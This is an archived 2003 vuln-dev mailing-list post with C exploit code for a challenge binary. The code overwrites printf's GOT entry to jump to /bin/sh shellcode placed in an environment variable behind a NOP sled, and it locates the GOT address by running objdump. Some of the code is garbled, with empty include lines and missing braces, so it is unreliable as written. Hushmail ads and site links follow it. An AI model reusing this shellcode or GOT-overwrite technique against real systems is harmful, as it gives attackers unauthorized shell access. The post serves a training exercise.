[Vuln-dev Challenge] example exploit for 2

example exploit for vuln-dev challenge 2, requires the address of the shellcode in the environment as an argument

/*

• example exploit code for vuln-dev challenge 2
  *
  
• we overwrite printf's got table entry to point to our
• shellcode in the environment
  *
  
• omicron tau - ot@hushmail.com
  */
  

/*

• objdump, grep, and awk need to be in your path
  *
  
• tested on linux 2.4.20 using env address 0xbfffe2ac
  *
  
• rm db.log first
  */
  

#include 
#include 
#include 
#include 

#define VULNPATH        "./vdc2"                /* path to vulnerable

/* /bin/sh */
char shellcode[]=

    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
    "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
    "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
    "\x63\x64\x65";

unsigned int go;        /* GOT entry address for printf */

void
find_got_addr()
{

        FILE *p;
        char buf[1024];

        snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' |
" \
            "awk '{ print \"0x\"$1 }'", VULNPATH);
        p = popen(buf, "r");
        fgets(buf, sizeof(buf), p);
        pclose(p);

        go = strtoul(buf, NULL, 0);
        go -= 2;        /* ;; */

        printf("[!] using got addr 0x%x\n", go);

int
main(int argc, char *argv[])
{

	char envbuf[8192];
	char obuf[129];
	char scbuf[5];
	unsigned int scaddr;
	int i;

	if (argc < 2) {
		fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
		exit(1);
	}
	scaddr = strtoul(argv[1], NULL, 0);

	find_got_addr();

	memset(obuf, 0, sizeof(obuf));
	for (i = 0; i < sizeof(obuf) - 1; i+=4)
		memcpy(&obuf[i], &go, 4);
	obuf[sizeof(obuf) - 1] = 0;

	memset(envbuf, 0x90, sizeof(envbuf));
	memcpy(&envbuf[8000], shellcode, strlen(shellcode));
	envbuf[sizeof(envbuf) - 1] = 0;
	setenv("SC", envbuf, 1);

	memcpy(scbuf, &scaddr, 4);
	scbuf[4] = 0;
	execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

	return(0);

Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 Received on Sat May 24 17:17:23 2003

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek